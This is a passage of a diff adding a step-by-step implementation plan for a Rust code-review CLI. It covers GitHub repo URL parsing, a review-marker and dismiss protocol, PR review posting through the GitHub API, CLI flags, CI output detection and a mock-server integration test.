+fn parse_repo_https() {
+    let (owner, repo) = parse_github_repo_url("https://github.com/jsnyder/quorum.git").unwrap();
+    assert_eq!(owner, "jsnyder");
+    assert_eq!(repo, "quorum");
+}
+
+#[test]
+fn parse_repo_https_no_dot_git() {
+    let (owner, repo) = parse_github_repo_url("https://github.com/jsnyder/quorum").unwrap();
+    assert_eq!(owner, "jsnyder");
+    assert_eq!(repo, "quorum");
+}
+
+#[test]
+fn parse_repo_ssh() {
+    let (owner, repo) = parse_github_repo_url("git@github.com:jsnyder/quorum.git").unwrap();
+    assert_eq!(owner, "jsnyder");
+    assert_eq!(repo, "quorum");
+}
+
+#[test]
+fn parse_repo_slash_format() {
+    let (owner, repo) = parse_github_repo_url("jsnyder/quorum").unwrap();
+    assert_eq!(owner, "jsnyder");
+    assert_eq!(repo, "quorum");
+}
+
+#[test]
+fn parse_repo_invalid() {
+    assert!(parse_github_repo_url("not-a-repo").is_none());
+}
+
+#[test]
+fn parse_github_enterprise() {
+    let (owner, repo) = parse_github_repo_url("https://github.example.com/org/repo.git").unwrap();
+    assert_eq!(owner, "org");
+    assert_eq!(repo, "repo");
+}
+```
+
+- [ ] **Step 2: Run tests to verify they fail**
+
+Run: `cargo test --bin quorum github_report::tests::parse_repo -- --nocapture 2>&1 | head -20`
+
+- [ ] **Step 3: Implement parse_github_repo_url**
+
+```rust
+pub fn parse_github_repo_url(url: &str) -> Option<(String, String)> {
+    // Direct owner/repo format (e.g. from GITHUB_REPOSITORY)
+    if !url.contains('/') || url.contains("://") || url.contains('@') {
+        // Not a simple owner/repo — try URL parsing below
+    } else {
+        let parts: Vec<&str> = url.split('/').collect();
+        if parts.len() == 2 && !parts[0].is_empty() && !parts[1].is_empty() {
+            return Some((parts[0].to_string(), parts[1].to_string()));
+        }
+    }
+
+    // SSH: git@host:owner/repo.git
+    if let Some(colon_part) = url.strip_prefix("git@") {
+        if let Some(path) = colon_part.split(':').nth(1) {
+            return parse_owner_repo_from_path(path);
+        }
+    }
+
+    // HTTPS: https://host/owner/repo.git
+    if url.starts_with("https://") || url.starts_with("http://") {
+        let path = url
+            .split("://")
+            .nth(1)?
+            .split('/')
+            .skip(1) // skip hostname
+            .collect::<Vec<_>>()
+            .join("/");
+        return parse_owner_repo_from_path(&path);
+    }
+
+    None
+}
+
+fn parse_owner_repo_from_path(path: &str) -> Option<(String, String)> {
+    let clean = path.strip_suffix(".git").unwrap_or(path);
+    let parts: Vec<&str> = clean.split('/').collect();
+    if parts.len() >= 2 && !parts[0].is_empty() && !parts[1].is_empty() {
+        Some((parts[0].to_string(), parts[1].to_string()))
+    } else {
+        None
+    }
+}
+```
+
+- [ ] **Step 4: Implement resolve_github_context**
+
+```rust
+#[derive(Debug, Clone)]
+pub struct GitHubContext {
+    pub owner: String,
+    pub repo: String,
+    pub token: String,
+}
+
+#[derive(Debug)]
+pub enum GitHubContextError {
+    NoToken,
+    NoRepo(String),
+}
+
+impl std::fmt::Display for GitHubContextError {
+    fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
+        match self {
+            Self::NoToken => write!(f, "No GitHub token found. Set GITHUB_TOKEN or use --github-token"),
+            Self::NoRepo(detail) => write!(f, "Could not determine repository: {}", detail),
+        }
+    }
+}
+
+pub fn resolve_github_context(
+    token_flag: Option<&str>,
+    repo_flag: Option<&str>,
+) -> Result<GitHubContext, GitHubContextError> {
+    let token = token_flag
+        .map(|s| s.to_string())
+        .or_else(|| std::env::var("GITHUB_TOKEN").ok())
+        .filter(|s| !s.is_empty())
+        .ok_or(GitHubContextError::NoToken)?;
+
+    let (owner, repo) = if let Some(r) = repo_flag {
+        parse_github_repo_url(r)
+            .ok_or_else(|| GitHubContextError::NoRepo(format!("invalid format: {}", r)))?
+    } else if let Ok(gh_repo) = std::env::var("GITHUB_REPOSITORY") {
+        parse_github_repo_url(&gh_repo)
+            .ok_or_else(|| GitHubContextError::NoRepo(format!("GITHUB_REPOSITORY={}", gh_repo)))?
+    } else {
+        // Try git remote
+        let output = std::process::Command::new("git")
+            .args(["remote", "get-url", "origin"])
+            .output()
+            .map_err(|e| GitHubContextError::NoRepo(format!("git remote failed: {}", e)))?;
+        let url = String::from_utf8_lossy(&output.stdout).trim().to_string();
+        parse_github_repo_url(&url)
+            .ok_or_else(|| GitHubContextError::NoRepo(format!("cannot parse remote: {}", url)))?
+    };
+
+    Ok(GitHubContext { owner, repo, token })
+}
+```
+
+- [ ] **Step 5: Run all tests**
+
+Run: `cargo test --bin quorum github_report -- --nocapture 2>&1 | tail -20`
+Expected: all tests pass
+
+- [ ] **Step 6: Commit**
+
+```bash
+git add src/github_report.rs
+git commit -m "feat(github): add repo URL parsing and context resolution (#313)"
+```
+
+---
+
+### Task 5: Marker Protocol and Dismiss Logic
+
+Build/parse the review marker and implement dismiss-previous logic.
+
+**Files:**
+- Modify: `src/github_report.rs`
+
+- [ ] **Step 1: Write failing tests**
+
+```rust
+#[test]
+fn build_marker() {
+    let m = build_review_marker("01JTEST", "abc1234", "0.27.0");
+    assert!(m.starts_with("<!-- quorum-review-marker:v1"));
+    assert!(m.contains("run_id=01JTEST"));
+    assert!(m.contains("sha=abc1234"));
+    assert!(m.contains("version=0.27.0"));
+    assert!(m.ends_with("-->"));
+}
+
+#[test]
+fn find_marker_in_body() {
+    let body = "Some text\n<!-- quorum-review-marker:v1 run_id=X sha=Y version=0.27.0 -->\nMore text";
+    assert!(body_contains_quorum_marker(body));
+}
+
+#[test]
+fn no_marker_in_body() {
+    assert!(!body_contains_quorum_marker("Just a regular review body"));
+}
+
+#[test]
+fn find_marker_with_extra_whitespace() {
+    let body = "<!-- quorum-review-marker:v1  run_id=X  sha=Y  version=0.27.0 -->";
+    assert!(body_contains_quorum_marker(body));
+}
+```
+
+- [ ] **Step 2: Run tests to verify they fail**
+
+- [ ] **Step 3: Implement marker functions**
+
+```rust
+const MARKER_PREFIX: &str = "quorum-review-marker:v1";
+
+pub fn build_review_marker(run_id: &str, sha: &str, version: &str) -> String {
+    format!("<!-- {} run_id={} sha={} version={} -->", MARKER_PREFIX, run_id, sha, version)
+}
+
+pub fn body_contains_quorum_marker(body: &str) -> bool {
+    body.contains(MARKER_PREFIX)
+}
+```
+
+- [ ] **Step 4: Run tests to verify they pass**
+
+- [ ] **Step 5: Commit**
+
+```bash
+git add src/github_report.rs
+git commit -m "feat(github): add review marker build/detect for dismiss protocol (#313)"
+```
+
+---
+
+### Task 6: GitHub API Client (`post_review`, dismiss, fetch diff)
+
+The core async HTTP calls to GitHub.
+
+**Files:**
+- Modify: `src/github_report.rs`
+
+- [ ] **Step 1: Define request/response types and error enum**
+
+```rust
+use serde::{Deserialize, Serialize};
+
+#[derive(Debug)]
+pub enum GitHubReportError {
+    Http(reqwest::Error),
+    Api { status: u16, message: String },
+    NoToken,
+    NoRepo(String),
+    InvalidFindings(String),
+}
+
+impl std::fmt::Display for GitHubReportError {
+    fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
+        match self {
+            Self::Http(e) => write!(f, "HTTP error: {}", e),
+            Self::Api { status, message } => write!(f, "GitHub API error ({}): {}", status, message),
+            Self::NoToken => write!(f, "No GitHub token"),
+            Self::NoRepo(d) => write!(f, "Cannot determine repo: {}", d),
+            Self::InvalidFindings(d) => write!(f, "Invalid findings: {}", d),
+        }
+    }
+}
+
+impl From<reqwest::Error> for GitHubReportError {
+    fn from(e: reqwest::Error) -> Self { Self::Http(e) }
+}
+
+pub struct PostReviewRequest {
+    pub owner: String,
+    pub repo: String,
+    pub pr_number: u64,
+    pub token: String,
+    pub findings: Vec<Finding>,
+    pub diff_text: String,
+    pub version: String,
+    pub run_id: String,
+    pub commit_sha: String,
+}
+
+pub struct PostReviewResult {
+    pub review_id: u64,
+    pub inline_count: usize,
+    pub body_count: usize,
+    pub dismissed_previous: Option<u64>,
+}
+
+#[derive(Serialize)]
+struct CreateReviewRequest {
+    commit_id: String,
+    event: String,
+    body: String,
+    comments: Vec<ReviewComment>,
+}
+
+#[derive(Serialize)]
+struct ReviewComment {
+    path: String,
+    body: String,
+    line: u32,
+    side: String,
+    #[serde(skip_serializing_if = "Option::is_none")]
+    start_line: Option<u32>,
+    #[serde(skip_serializing_if = "Option::is_none")]
+    start_side: Option<String>,
+}
+
+#[derive(Deserialize)]
+struct ReviewResponse {
+    id: u64,
+}
+
+#[derive(Deserialize)]
+struct ListReviewEntry {
+    id: u64,
+    body: Option<String>,
+}
+
+#[derive(Serialize)]
+struct DismissRequest {
+    message: String,
+    event: String,
+}
+```
+
+- [ ] **Step 2: Implement the API functions**
+
+```rust
+const GITHUB_API_BASE: &str = "https://api.github.com";
+const GITHUB_API_VERSION: &str = "2026-03-10";
+
+fn github_client_headers(token: &str) -> reqwest::header::HeaderMap {
+    let mut headers = reqwest::header::HeaderMap::new();
+    headers.insert(
+        reqwest::header::ACCEPT,
+        "application/vnd.github+json".parse().unwrap(),
+    );
+    headers.insert(
+        reqwest::header::AUTHORIZATION,
+        format!("Bearer {}", token).parse().unwrap(),
+    );
+    headers.insert(
+        "X-GitHub-Api-Version",
+        GITHUB_API_VERSION.parse().unwrap(),
+    );
+    headers
+}
+
+async fn dismiss_previous_reviews(
+    client: &reqwest::Client,
+    req: &PostReviewRequest,
+) -> Option<u64> {
+    let url = format!(
+        "{}/repos/{}/{}/pulls/{}/reviews",
+        GITHUB_API_BASE, req.owner, req.repo, req.pr_number
+    );
+    let headers = github_client_headers(&req.token);
+    let resp = match client.get(&url).headers(headers.clone()).send().await {
+        Ok(r) => r,
+        Err(e) => {
+            eprintln!("Warning: failed to list reviews for dismiss: {}", e);
+            return None;
+        }
+    };
+    let reviews: Vec<ListReviewEntry> = match resp.json().await {
+        Ok(r) => r,
+        Err(e) => {
+            eprintln!("Warning: failed to parse review list: {}", e);
+            return None;
+        }
+    };
+
+    let mut dismissed_id = None;
+    for review in &reviews {
+        if let Some(body) = &review.body {
+            if body_contains_quorum_marker(body) {
+                let dismiss_url = format!("{}/{}/dismissals", url, review.id);
+                let dismiss_body = DismissRequest {
+                    message: "Superseded by updated quorum review".into(),
+                    event: "DISMISS".into(),
+                };
+                match client
+                    .put(&dismiss_url)
+                    .headers(headers.clone())
+                    .json(&dismiss_body)
+                    .send()
+                    .await
+                {
+                    Ok(r) if r.status().is_success() => {
+                        dismissed_id = Some(review.id);
+                    }
+                    Ok(r) => {
+                        eprintln!(
+                            "Warning: dismiss review {} returned {}: best-effort, continuing",
+                            review.id,
+                            r.status()
+                        );
+                    }
+                    Err(e) => {
+                        eprintln!("Warning: dismiss review {} failed: {}", review.id, e);
+                    }
+                }
+            }
+        }
+    }
+    dismissed_id
+}
+
+pub async fn fetch_pr_diff(
+    client: &reqwest::Client,
+    owner: &str,
+    repo: &str,
+    pr_number: u64,
+    token: &str,
+) -> Result<String, GitHubReportError> {
+    let url = format!(
+        "{}/repos/{}/{}/pulls/{}",
+        GITHUB_API_BASE, owner, repo, pr_number
+    );
+    let mut headers = github_client_headers(token);
+    headers.insert(
+        reqwest::header::ACCEPT,
+        "application/vnd.github.diff".parse().unwrap(),
+    );
+    let resp = client.get(&url).headers(headers).send().await?;
+    if !resp.status().is_success() {
+        return Err(GitHubReportError::Api {
+            status: resp.status().as_u16(),
+            message: resp.text().await.unwrap_or_default(),
+        });
+    }
+    Ok(resp.text().await?)
+}
+
+pub async fn fetch_pr_head_sha(
+    client: &reqwest::Client,
+    owner: &str,
+    repo: &str,
+    pr_number: u64,
+    token: &str,
+) -> Result<String, GitHubReportError> {
+    let url = format!(
+        "{}/repos/{}/{}/pulls/{}",
+        GITHUB_API_BASE, owner, repo, pr_number
+    );
+    let headers = github_client_headers(token);
+    let resp = client.get(&url).headers(headers).send().await?;
+    if !resp.status().is_success() {
+        return Err(GitHubReportError::Api {
+            status: resp.status().as_u16(),
+            message: resp.text().await.unwrap_or_default(),
+        });
+    }
+    let body: serde_json::Value = resp.json().await?;
+    body["head"]["sha"]
+        .as_str()
+        .map(|s| s.to_string())
+        .ok_or_else(|| GitHubReportError::Api {
+            status: 200,
+            message: "PR response missing head.sha".into(),
+        })
+}
+
+pub async fn post_review(
+    client: &reqwest::Client,
+    req: &PostReviewRequest,
+) -> Result<PostReviewResult, GitHubReportError> {
+    let diff_ranges = crate::hydration::parse_unified_diff(&req.diff_text);
+    let marker = build_review_marker(&req.run_id, &req.commit_sha, &req.version);
+
+    // Dismiss previous reviews (best-effort)
+    let dismissed_previous = dismiss_previous_reviews(client, req).await;
+
+    // Classify findings
+    let mut inline_comments = Vec::new();
+    let mut body_findings = Vec::new();
+
+    for finding in &req.findings {
+        // Determine file path — strip to repo-relative
+        // Findings carry file info externally; for now we need file_path
+        // from the review pipeline. We'll use the finding's evidence or
+        // reconstruct from context. For the MVP, findings are already
+        // associated with files via the grouped JSON output.
+        // The caller provides findings per-file with the path.
+        let file_path = finding.evidence.first().map(|s| s.as_str()).unwrap_or("");
+        let target = classify_posting_target(finding, file_path, &diff_ranges);
+        match target {
+            PostingTarget::Inline => {
+                let body = render_inline_comment(finding, &req.version);
+                inline_comments.push(ReviewComment {
+                    path: file_path.to_string(),
+                    body,
+                    line: finding.anchor_line(),
+                    side: "RIGHT".into(),
+                    start_line: if finding.line_start != finding.line_end {
+                        Some(finding.line_start)
+                    } else {
+                        None
+                    },
+                    start_side: if finding.line_start != finding.line_end {
+                        Some("RIGHT".into())
+                    } else {
+                        None
+                    },
+                });
+            }
+            PostingTarget::Body => {
+                body_findings.push(finding.clone());
+            }
+        }
+    }
+
+    let review_body = render_review_body(
+        &marker,
+        inline_comments.len(),
+        &body_findings,
+        &req.version,
+    );
+
+    let create_req = CreateReviewRequest {
+        commit_id: req.commit_sha.clone(),
+        event: "COMMENT".into(),
+        body: review_body,
+        comments: inline_comments,
+    };
+
+    let url = format!(
+        "{}/repos/{}/{}/pulls/{}/reviews",
+        GITHUB_API_BASE, req.owner, req.repo, req.pr_number
+    );
+    let headers = github_client_headers(&req.token);
+    let resp = client
+        .post(&url)
+        .headers(headers)
+        .json(&create_req)
+        .send()
+        .await?;
+
+    if !resp.status().is_success() {
+        return Err(GitHubReportError::Api {
+            status: resp.status().as_u16(),
+            message: resp.text().await.unwrap_or_default(),
+        });
+    }
+
+    let review: ReviewResponse = resp.json().await?;
+
+    Ok(PostReviewResult {
+        review_id: review.id,
+        inline_count: create_req.comments.len(),
+        body_count: body_findings.len(),
+        dismissed_previous,
+    })
+}
+```
+
+- [ ] **Step 3: Run clippy and fix any issues**
+
+Run: `cargo clippy --bin quorum -- -D warnings 2>&1 | tail -20`
+
+- [ ] **Step 4: Commit**
+
+```bash
+git add src/github_report.rs
+git commit -m "feat(github): add post_review, dismiss, and diff fetch API calls (#313)"
+```
+
+---
+
+### Task 7: CLI Integration — `Report` Subcommand
+
+Wire up the `quorum report` subcommand.
+
+**Files:**
+- Modify: `src/cli/mod.rs`
+- Modify: `src/main.rs`
+
+- [ ] **Step 1: Add ReportOpts and Command variant**
+
+In `src/cli/mod.rs`, add the `Report` variant to the `Command` enum (after `Calibrate`):
+
+```rust
+/// Post review findings as GitHub PR comments
+Report(ReportOpts),
+```
+
+And add the struct (after `CalibrateOpts`):
+
+```rust
+#[derive(Parser)]
+pub struct ReportOpts {
+    /// JSON findings file path, or "-" for stdin
+    pub findings_file: String,
+
+    /// Pull request number
+    #[arg(long)]
+    pub pr: u64,
+
+    /// GitHub personal access token (default: GITHUB_TOKEN env)
+    #[arg(long, env = "GITHUB_TOKEN", hide_env_values = true)]
+    pub github_token: Option<String>,
+
+    /// Repository in owner/repo format (default: auto-detect)
+    #[arg(long)]
+    pub github_repo: Option<String>,
+
+    /// Local diff file (default: fetch from PR API)
+    #[arg(long)]
+    pub diff_file: Option<PathBuf>,
+}
+```
+
+- [ ] **Step 2: Add `run_report` handler in main.rs**
+
+Add to the match in `main()`:
+
+```rust
+cli::Command::Report(opts) => {
+    let exit_code = run_report(opts).await;
+    std::process::exit(exit_code);
+}
+```
+
+Implement `run_report`:
+
+```rust
+async fn run_report(opts: cli::ReportOpts) -> i32 {
+    // Read findings from file or stdin
+    let json_str = if opts.findings_file == "-" {
+        use std::io::Read;
+        let mut buf = String::new();
+        if let Err(e) = std::io::stdin().read_to_string(&mut buf) {
+            eprintln!("Error: failed to read stdin: {}", e);
+            return 3;
+        }
+        buf
+    } else {
+        match std::fs::read_to_string(&opts.findings_file) {
+            Ok(s) => s,
+            Err(e) => {
+                eprintln!("Error: failed to read {}: {}", opts.findings_file, e);
+                return 3;
+            }
+        }
+    };
+
+    let findings: Vec<finding::Finding> = match serde_json::from_str(&json_str) {
+        Ok(f) => f,
+        Err(e) => {
+            eprintln!("Error: failed to parse findings JSON: {}", e);
+            return 3;
+        }
+    };
+
+    // Resolve GitHub context
+    let ctx = match github_report::resolve_github_context(
+        opts.github_token.as_deref(),
+        opts.github_repo.as_deref(),
+    ) {
+        Ok(c) => c,
+        Err(e) => {
+            eprintln!("Error: {}", e);
+            return 3;
+        }
+    };
+
+    let client = reqwest::Client::builder()
+        .connect_timeout(std::time::Duration::from_secs(10))
+        .timeout(std::time::Duration::from_secs(60))
+        .build()
+        .unwrap();
+
+    // Get diff text
+    let diff_text = if let Some(ref diff_path) = opts.diff_file {
+        match std::fs::read_to_string(diff_path) {
+            Ok(d) => d,
+            Err(e) => {
+                eprintln!("Error: failed to read diff file: {}", e);
+                return 3;
+            }
+        }
+    } else {
+        match github_report::fetch_pr_diff(&client, &ctx.owner, &ctx.repo, opts.pr, &ctx.token).await {
+            Ok(d) => d,
+            Err(e) => {
+                eprintln!("Error: failed to fetch PR diff: {}", e);
+                return 3;
+            }
+        }
+    };
+
+    // Get commit SHA
+    let commit_sha = match github_report::fetch_pr_head_sha(
+        &client, &ctx.owner, &ctx.repo, opts.pr, &ctx.token,
+    ).await {
+        Ok(sha) => sha,
+        Err(e) => {
+            eprintln!("Error: failed to fetch PR head SHA: {}", e);
+            return 3;
+        }
+    };
+
+    let run_id = ulid::Ulid::new().to_string();
+    let version = env!("CARGO_PKG_VERSION").to_string();
+
+    let req = github_report::PostReviewRequest {
+        owner: ctx.owner,
+        repo: ctx.repo,
+        pr_number: opts.pr,
+        token: ctx.token,
+        findings,
+        diff_text,
+        version,
+        run_id,
+        commit_sha,
+    };
+
+    eprint!("Posting {} findings to PR #{}...", req.findings.len(), req.pr_number);
+
+    match github_report::post_review(&client, &req).await {
+        Ok(result) => {
+            if let Some(dismissed) = result.dismissed_previous {
+                eprint!(" dismissed review {}...", dismissed);
+            }
+            eprintln!(" done ({} inline, {} in summary)", result.inline_count, result.body_count);
+            0
+        }
+        Err(e) => {
+            eprintln!("\nError: GitHub post failed: {}", e);
+            3
+        }
+    }
+}
+```
+
+- [ ] **Step 3: Verify compilation**
+
+Run: `cargo build --bin quorum 2>&1 | tail -10`
+Expected: compiles cleanly
+
+- [ ] **Step 4: Verify help output**
+
+Run: `cargo run -- report --help 2>&1`
+Expected: shows ReportOpts flags
+
+- [ ] **Step 5: Commit**
+
+```bash
+git add src/cli/mod.rs src/main.rs
+git commit -m "feat(github): add quorum report subcommand (#313)"
+```
+
+---
+
+### Task 8: CLI Integration — `--github-pr` on ReviewOpts
+
+Wire up the convenience flag on `quorum review`.
+
+**Files:**
+- Modify: `src/cli/mod.rs` (ReviewOpts)
+- Modify: `src/main.rs` (run_review tail)
+
+- [ ] **Step 1: Add flags to ReviewOpts**
+
+In `src/cli/mod.rs`, add to `ReviewOpts` (after `judge_model`):
+
+```rust
+/// Post findings as GitHub PR review comments
+#[arg(long)]
+pub github_pr: Option<u64>,
+
+/// GitHub personal access token (default: GITHUB_TOKEN env)
+#[arg(long, env = "GITHUB_TOKEN", hide_env_values = true)]
+pub github_token: Option<String>,
+
+/// Repository in owner/repo format (default: auto-detect)
+#[arg(long)]
+pub github_repo: Option<String>,
+```
+
+- [ ] **Step 2: Add post-review hook in run_review**
+
+In `src/main.rs`, just before the final `output::compute_exit_code(&all_findings)` line at the end of `run_review` (~line 1874), insert:
+
+```rust
+    // Post to GitHub PR if --github-pr is set (non-fatal side-effect)
+    if let Some(pr_number) = opts.github_pr {
+        let review_exit = output::compute_exit_code(&all_findings);
+        let ctx = match github_report::resolve_github_context(
+            opts.github_token.as_deref(),
+            opts.github_repo.as_deref(),
+        ) {
+            Ok(c) => c,
+            Err(e) => {
+                eprintln!("Error: GitHub post failed: {} (review exit code preserved: {})", e, review_exit);
+                return review_exit;
+            }
+        };
+
+        let client = reqwest::Client::builder()
+            .connect_timeout(std::time::Duration::from_secs(10))
+            .timeout(std::time::Duration::from_secs(60))
+            .build()
+            .unwrap();
+
+        let diff_text = if let Some(ref diff_path) = opts.diff_file {
+            std::fs::read_to_string(diff_path).unwrap_or_default()
+        } else {
+            github_report::fetch_pr_diff(&client, &ctx.owner, &ctx.repo, pr_number, &ctx.token)
+                .await
+                .unwrap_or_default()
+        };
+
+        let commit_sha = github_report::fetch_pr_head_sha(
+            &client, &ctx.owner, &ctx.repo, pr_number, &ctx.token,
+        )
+        .await
+        .unwrap_or_else(|_| "unknown".into());
+
+        let run_id = ulid::Ulid::new().to_string();
+        let version = env!("CARGO_PKG_VERSION").to_string();
+
+        let req = github_report::PostReviewRequest {
+            owner: ctx.owner,
+            repo: ctx.repo,
+            pr_number,
+            token: ctx.token,
+            findings: all_findings.clone(),
+            diff_text,
+            version,
+            run_id,
+            commit_sha,
+        };
+
+        eprint!("Posting {} findings to PR #{}...", req.findings.len(), pr_number);
+        match github_report::post_review(&client, &req).await {
+            Ok(result) => {
+                if let Some(dismissed) = result.dismissed_previous {
+                    eprint!(" dismissed review {}...", dismissed);
+                }
+                eprintln!(" done ({} inline, {} in summary)", result.inline_count, result.body_count);
+            }
+            Err(e) => {
+                eprintln!(
+                    "\nError: GitHub post failed: {} (review exit code preserved: {})",
+                    e, review_exit
+                );
+            }
+        }
+
+        return review_exit;
+    }
+```
+
+- [ ] **Step 3: Verify compilation**
+
+Run: `cargo build --bin quorum 2>&1 | tail -10`
+
+- [ ] **Step 4: Verify help output**
+
+Run: `cargo run -- review --help 2>&1 | grep github`
+Expected: shows `--github-pr`, `--github-token`, `--github-repo`
+
+- [ ] **Step 5: Commit**
+
+```bash
+git add src/cli/mod.rs src/main.rs
+git commit -m "feat(github): add --github-pr flag to quorum review (#313)"
+```
+
+---
+
+### Task 9: CI Output Mode — `GITHUB_ACTIONS` Compact Detection
+
+**Files:**
+- Modify: `src/output/mod.rs:422-428`
+
+- [ ] **Step 1: Write failing test**
+
+In `src/output/mod.rs` tests:
+
+```rust
+#[test]
+fn should_use_compact_github_actions() {
+    std::env::set_var("GITHUB_ACTIONS", "true");
+    assert!(should_use_compact(false));
+    std::env::remove_var("GITHUB_ACTIONS");
+}
+```
+
+- [ ] **Step 2: Run test to verify it fails**
+
+Run: `cargo test --bin quorum output::tests::should_use_compact_github_actions -- --nocapture 2>&1`
+Expected: FAIL
+
+- [ ] **Step 3: Add GITHUB_ACTIONS to should_use_compact**
+
+In `src/output/mod.rs`, modify `should_use_compact` (~line 422):
+
+```rust
+pub fn should_use_compact(compact_flag: bool) -> bool {
+    compact_flag
+        || is_env_set("CLAUDE_CODE")
+        || is_env_set("GEMINI_CLI")
+        || is_env_set("CODEX_CI")
+        || is_env_set("AGENT")
+        || is_env_set("GITHUB_ACTIONS")
+}
+```
+
+- [ ] **Step 4: Run test to verify it passes**
+
+- [ ] **Step 5: Commit**
+
+```bash
+git add src/output/mod.rs
+git commit -m "feat(github): detect GITHUB_ACTIONS for compact output mode (#313)"
+```
+
+---
+
+### Task 10: DESIGN.md and Workflow YAML
+
+**Files:**
+- Modify: `DESIGN.md`
+- Create: `.github/workflows/quorum-review-analyze.yml`
+- Create: `.github/workflows/quorum-review-report.yml`
+
+- [ ] **Step 1: Update DESIGN.md Section 2**
+
+Add `GITHUB_ACTIONS` to the compact detection list and detection logic. In the env vars list (~line 418-428 equivalent in DESIGN.md), add the bullet:
+
+```markdown
+- GITHUB_ACTIONS: GitHub Actions CI
+```
+
+And update the detection logic block:
+
+```
+if --json flag OR !stdout.is_terminal() -> JSON
+else if --compact or CLAUDE_CODE or GITHUB_ACTIONS env -> Compact
+else                                                    -> Human
+```
+
+- [ ] **Step 2: Add DESIGN.md Section 14: GitHub PR Comments**
+
+Add at the end of DESIGN.md before `## 13. Anti-patterns`:
+
+```markdown
+## 14. GitHub PR Comments
+
+When posting findings as GitHub PR review comments (`quorum report` or
+`quorum review --github-pr`), output uses GitHub-flavored Markdown
+consistent with the terminal format:
+
+### Inline comment (one per finding, on the diff line)
+
+    **!** Finding title — `category`
+
+    Description text with suggested fix.
+
+    *quorum 0.27.0 | model-name, source*
+
+### Review body
+
+    <!-- quorum-review-marker:v1 run_id=... sha=... version=... -->
+
+    ## Quorum Review
+
+    N findings (M critical, K warning, J info) | X inline, Y in summary
+
+    ### Findings outside changed lines
+
+    **~** Title — `category` L42
+
+    Description.
+
+    *quorum 0.27.0 | source*
+
+### Sanitization
+
+Always-on for PR comment bodies. Strips control characters, neutralizes
+@mentions and #refs (rendered as inline code), removes image/anchor HTML
+tags, escapes backtick runs of 3+, and truncates at 60,000 chars.
+
+### Re-run behavior
+
+Each review includes a `quorum-review-marker` HTML comment. On re-run,
+previous quorum reviews are dismissed (best-effort) before the new review
+is posted.
+```
+
+- [ ] **Step 3: Create Stage 1 workflow**
+
+Write `.github/workflows/quorum-review-analyze.yml` with the content from the design spec (Stage 1 section).
+
+- [ ] **Step 4: Create Stage 2 workflow**
+
+Write `.github/workflows/quorum-review-report.yml` with the content from the design spec (Stage 2 section).
+
+- [ ] **Step 5: Commit**
+
+```bash
+git add DESIGN.md .github/workflows/quorum-review-analyze.yml .github/workflows/quorum-review-report.yml
+git commit -m "docs: update DESIGN.md and add CI workflows for PR review (#313)"
+```
+
+---
+
+### Task 11: Version Bump and CLAUDE.md Update
+
+**Files:**
+- Modify: `Cargo.toml` (version)
+- Modify: `CLAUDE.md` (add `report` command and `--github-pr` flag)
+
+- [ ] **Step 1: Bump version to 0.27.0**
+
+In `Cargo.toml`, change `version = "0.26.0"` to `version = "0.27.0"`.
+
+- [ ] **Step 2: Update CLAUDE.md commands section**
+
+Add to the commands list:
+
+```markdown
+cargo run -- report findings.json --pr 42     # post findings to GitHub PR
+cargo run -- review src/*.rs --github-pr 42   # review + post to PR in one step
+```
+
+Add to environment section:
+
+```markdown
+GITHUB_TOKEN=ghp_...                           # GitHub API token for PR comments
+```
+
+- [ ] **Step 3: Run full test suite**
+
+Run: `cargo test --bin quorum 2>&1 | tail -5`
+Expected: all tests pass
+
+- [ ] **Step 4: Run clippy**
+
+Run: `cargo clippy --bin quorum -- -D warnings 2>&1 | tail -5`
+Expected: no warnings
+
+- [ ] **Step 5: Commit**
+
+```bash
+git add Cargo.toml CLAUDE.md
+git commit -m "chore: bump version to 0.27.0 and update CLAUDE.md (#313)"
+```
+
+---
+
+### Task 12: Integration Test with Mock HTTP Server
+
+End-to-end test of the `post_review` flow against a mock server.
+
+**Files:**
+- Modify: `src/github_report.rs` (make GITHUB_API_BASE configurable for tests)
+
+- [ ] **Step 1: Make API base URL injectable for testing**
+
+Add a `base_url` field to `PostReviewRequest`:
+
+```rust
+pub struct PostReviewRequest {
+    // ... existing fields ...
+    /// Override API base URL (default: https://api.github.com). For testing.
+    pub api_base_url: Option<String>,
+}
+```
+
+Update all URL constructions in the API functions to use `req.api_base_url.as_deref().unwrap_or(GITHUB_API_BASE)`.
+
+- [ ] **Step 2: Write integration test**
+
+```rust
+#[cfg(test)]
+mod integration_tests {
+    use super::*;
+    use std::net::TcpListener;
+
+    #[tokio::test]
+    async fn post_review_creates_review_with_inline_comments() {
+        // Start a minimal mock server
+        let listener = TcpListener::bind("127.0.0.1:0").unwrap();
+        let port = listener.local_addr().unwrap().port();
+        let base_url = format!("http://127.0.0.1:{}", port);
+
+        // Spawn mock handler in background
+        let handle = tokio::spawn(async move {
+            // Accept and respond to: list reviews, create review
+            for _ in 0..2 {
+                let (mut stream, _) = listener.accept().unwrap();
+                use std::io::{Read, Write};
+                let mut buf = [0u8; 4096];
+                let n = stream.read(&mut buf).unwrap();
+                let req_str = String::from_utf8_lossy(&buf[..n]);
+
+                if req_str.contains("GET") {
+                    // List reviews — return empty
+                    let body = "[]";
+                    let resp = format!(
+                        "HTTP/1.1 200 OK\r\nContent-Length: {}\r\n\r\n{}",
+                        body.len(), body
+                    );
+                    stream.write_all(resp.as_bytes()).unwrap();
+                } else {
+                    // Create review — return id
+                    let body = r#"{"id": 42}"#;
+                    let resp = format!(
+                        "HTTP/1.1 200 OK\r\nContent-Length: {}\r\n\r\n{}",
+                        body.len(), body
+                    );
+                    stream.write_all(resp.as_bytes()).unwrap();
+                }
+            }
+        });
+
+        let diff = "--- a/src/auth.rs\n+++ b/src/auth.rs\n@@ -40,3 +40,5 @@\n context\n+added\n+added\n context\n";
+        let f = make_finding("f1", 41, true);
+        let client = reqwest::Client::new();
+
+        let req = PostReviewRequest {
+            owner: "test".into(),
+            repo: "repo".into(),
+            pr_number: 1,
+            token: "fake-token".into(),
+            findings: vec![f],
+            diff_text: diff.into(),
+            version: "0.27.0".into(),
+            run_id: "01TEST".into(),
+            commit_sha: "abc123".into(),
+            api_base_url: Some(base_url),
+        };
+
+        let result = post_review(&client, &req).await.unwrap();
+        assert_eq!(result.review_id, 42);
+        assert_eq!(result.inline_count, 1);
+        assert_eq!(result.body_count, 0);
+
+        handle.abort();
+    }
+}
+```
+
+- [ ] **Step 3: Run integration test**
+
+Run: `cargo test --bin quorum github_report::integration_tests -- --nocapture 2>&1 | tail -10`
+Expected: PASS
+
+- [ ] **Step 4: Commit**
+
